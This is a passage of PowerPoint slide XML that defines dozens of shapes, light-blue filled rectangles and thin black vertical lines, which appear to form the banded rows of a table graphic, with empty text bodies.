          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="2130566"/>
            <a:ext cx="0" cy="269875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="269875">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="269749"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="17226">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767581" y="2112269"/>
            <a:ext cx="0" cy="288290"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="288289">
                <a:moveTo>
                  <a:pt x="0" y="288047"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="17227">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="2400300"/>
            <a:ext cx="6769100" cy="197485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="197485">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="197357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="197357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="2400303"/>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18" name="object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="2400303"/>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19" name="object 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="2597657"/>
            <a:ext cx="6769100" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="198119">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="198120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="198119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="2597668"/>
            <a:ext cx="0" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="198119">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="198117"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="17226">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="2597668"/>
            <a:ext cx="0" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="198119">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="198117"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="17226">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="2795777"/>
            <a:ext cx="6769100" cy="197485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="197485">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="197357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="197357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="2795786"/>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24" name="object 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="2795786"/>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25" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="2993135"/>
            <a:ext cx="6769100" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="198119">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26" name="object 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="2993151"/>
            <a:ext cx="0" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="198119">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="198117"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="17226">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="2993151"/>
            <a:ext cx="0" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="198119">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="198117"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="17226">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="3191255"/>
            <a:ext cx="6769100" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="198120">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="198120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="198119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="3191269"/>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30" name="object 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="3191269"/>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31" name="object 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="3389376"/>
            <a:ext cx="6769100" cy="197485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="197485">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="197358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="197358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="3389387"/>
            <a:ext cx="0" cy="197485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="197485">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="197352"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="17226">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="3389387"/>
            <a:ext cx="0" cy="197485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="197485">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="197352"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="17226">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="3586734"/>
            <a:ext cx="6769100" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="198120">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35" name="object 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="358675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36" name="object 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="358675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37" name="object 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="3784853"/>
            <a:ext cx="6769100" cy="197485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="197485">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="197358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="197358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="object 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="3784869"/>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39" name="object 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="3784869"/>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40" name="object 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="3982211"/>
            <a:ext cx="6769100" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="198120">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41" name="object 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="398222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42" name="object 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="398222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43" name="object 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="4180332"/>
            <a:ext cx="6769100" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="198120">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44" name="object 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="418035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45" name="object 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="418035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46" name="object 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="4378452"/>
            <a:ext cx="6769100" cy="197485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="197485">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="197358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="197358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="object 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="4378470"/>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48" name="object 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="4378470"/>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49" name="object 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="4575809"/>
            <a:ext cx="6769100" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="198120">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50" name="object 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="457582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51" name="object 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="457582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52" name="object 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="4773929"/>
            <a:ext cx="6769100" cy="197485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="197485">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="197358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="197358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="object 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="4773953"/>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54" name="object 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="4773953"/>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55" name="object 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="4971288"/>
            <a:ext cx="6769100" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="198120">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56" name="object 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="4971305"/>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57" name="object 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="4971305"/>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58" name="object 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="5169408"/>
            <a:ext cx="6769100" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="198120">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59" name="object 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="516942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60" name="object 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="5169422"/>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61" name="object 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="5367528"/>
            <a:ext cx="6769100" cy="197485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="197485">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="197358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="197358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="object 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="5367553"/>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63" name="object 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8767580" y="5367553"/>
            <a:ext cx="0" cy="197485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="197485">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="197365"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="17226">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="object 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1998726" y="5564885"/>
            <a:ext cx="6769100" cy="198120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6769100" h="198120">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="198120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="198120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6768846" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
